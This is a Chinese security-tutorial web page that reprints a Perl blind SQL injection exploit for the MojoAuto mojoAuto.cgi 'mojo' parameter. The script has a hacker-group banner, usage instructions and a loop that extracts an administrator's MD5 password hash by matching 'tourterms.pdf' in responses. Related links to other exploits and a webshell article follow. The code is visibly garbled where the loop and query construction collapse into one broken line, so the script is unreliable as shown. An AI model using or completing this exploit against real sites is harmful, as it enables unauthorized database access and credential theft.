手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit
MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit
摘要:#!/usr/bin/perluseLWP::UserAgent;useGetopt::Long;if(!$ARGV[1]){print"n...

#!/usr/bin/perl

use LWP::UserAgent;

use Getopt::Long;

if(!$ARGV[1])

{

print " n";

print " #################### Viva IslaMe Viva IslaMe ################n";

print " # MojoAuto Blind SQL Injection Exploit #n";

print " # (mojoAuto.cgi mojo ) #n";

print " # Author: Mr.SQL #n";

print " # EMAIL : SQL@HOTMAIL.IT #n";

print " # #n";

print " # -((:: GrE3E3E3E3E3ETZ ::))- #n";

print " # #n";

print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #n";

print " # :: ALwHeD :: milw0rm :: #n";

print " # #n";

print " # MuSliMs HaCkErS #n";

print " # #n";

print " # HOME: WwW.PaL- #n";

print " # #n";

print " # Usage : perl test.pl host #n";

print " # Example: perl test.pl / -d 10 #n";

print " # Options: #n";

print " # -d valid cat_a value #n";

print " #############################################################n";

exit;

}

my $host = $ARGV[0];

my $cat_a = $ARGV[2];

my %options = ();

GetOptions(%options, "u=i", "p=s", "d=i");

print "[~] Exploiting...n";

if($options{"b"})

{

$mojo = $options{"b"};

}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i get($query);

my $content = $resp->content;

my $regexp = "tourterms.pdf"; if($content =~ /$regexp/)

{

return 1;

}

else

{

return 0;

}

}

【MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit】相关文章:

十种获取webshell的方法

File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities

MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit

DreamNews Manager (id) Remote SQL Injection Vulnerability

gapicms 9.0.2 (dirDepth) Remote File Inclusion Vulnerability

Flash Cookie的有效关闭方法以此来避免信息泄露

入侵防护系统IPS怎么选择

命令行下的抗毒精英

e107 Plugin BLOG Engine 2.2 Blind SQL Injection Exploit

Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit

精品推荐
分类导航